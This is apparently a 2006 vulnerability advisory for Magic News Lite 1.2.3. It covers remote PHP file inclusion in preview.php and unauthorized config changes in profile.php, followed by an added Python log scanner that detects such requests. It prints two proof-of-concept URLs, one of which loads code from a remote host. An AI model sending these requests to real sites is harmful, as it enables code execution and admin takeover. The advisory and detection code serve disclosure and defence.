PHP Exec and Data Modification in Magic News Lite

Summary

Vulnerability: PHP Exec and Data Modification in Magic News Lite
Discovered: 2006.02.09
Last Update: 2006.02.19 (exploitation code published)
ID: EV0072
CVE: CVE-2006-0723, CVE-2006-0724
Risk Level: high
Type: Multiple Vulnerabilities
Status: Unpatched. No reply from developer(s)
Vendor: Reamday Enterprises (http://reamdaysoft.com)
Vulnerable Software: Magic News Lite (http://reamdaysoft.com/customers/magic-news-lite/download.html)
Version: 1.2.3
PoC/Exploit: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)

Description

Multiple vulnerabilities were found in the Magic News Lite (http://reamdaysoft.com/customers/magic-news-lite/download.html) script.

1. PHP Code Execution

Vulnerable script: preview.php

The variable $php_script_path is not initialized before it is used in include(), so its value can be supplied in the request. This can be used to execute arbitrary PHP code.

Condition: register_globals = ON


2. Unauthorized Data Modification

Vulnerable script: profile.php

The variables $action, $passwd, $admin_password, $new_passwd and $confirm_passwd are not initialized, and their values can be replaced by user-defined data. This can be used to make unauthorized modifications to config.php.

Condition: register_globals = ON

PoC/Exploit

1. PHP Code Execution Example

http://host/path/preview.php?php_script_path=http://remotehost/lib.php


2. Unauthorized Data Modification Example

http://host/path/profile.php?action=change&passwd=1&admin_password=1&new_passwd=new&confirm_passwd=new

Solution

A solution for "PHP Exec and Data Modification in Magic News Lite" is not available. Check the Reamday Enterprises website for updates.
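
With no fix available, reviewing web server access logs is one way to spot requests shaped like the two examples above. The following Python script is an added example, not part of the original advisory or the vendor's code; the log lines are constructed, and it assumes a combined-format access log and that a legitimate client never sends php_script_path or admin_password.

```python
import re
from urllib.parse import urlsplit, parse_qs

# script name -> (parameter a client should never supply, finding label)
# Assumption: legitimate use of these scripts never sends these parameters.
RULES = {
    "preview.php": ("php_script_path", "include-path override"),
    "profile.php": ("admin_password", "config value override"),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCHEME = re.compile(r"(?i)[a-z][a-z0-9+.-]*://")

def scan(lines):
    """Return (line_no, label, remote) for each suspicious request line.

    Only the query string is visible in an access log; with register_globals
    the same variables can also arrive via POST body or cookie, which this
    check cannot see.
    """
    findings = []
    for no, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        script = url.path.rsplit("/", 1)[-1].lower()
        if script not in RULES:
            continue
        param, label = RULES[script]
        params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes
        if param not in params:
            continue
        # A URL scheme in the value means the target is on another host.
        remote = any(SCHEME.match(v) for v in params[param])
        findings.append((no, label, remote))
    return findings

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Feb/2006:10:00:01 +0000] "GET /news/preview.php HTTP/1.1" 200 512',
    '192.0.2.44 - - [19/Feb/2006:10:02:13 +0000] "GET /news/preview.php?php_script_path=http%3A%2F%2Fremotehost%2Flib.php HTTP/1.1" 200 90',
    '192.0.2.44 - - [19/Feb/2006:10:02:40 +0000] "GET /news/profile.php?action=change&passwd=1&admin_password=1&new_passwd=new&confirm_passwd=new HTTP/1.1" 200 77',
    '192.0.2.10 - - [19/Feb/2006:10:05:00 +0000] "GET /news/profile.php HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for no, label, remote in scan(SAMPLE_LOG):
        print(f"line {no}: {label}" + (" (remote URL)" if remote else ""))
```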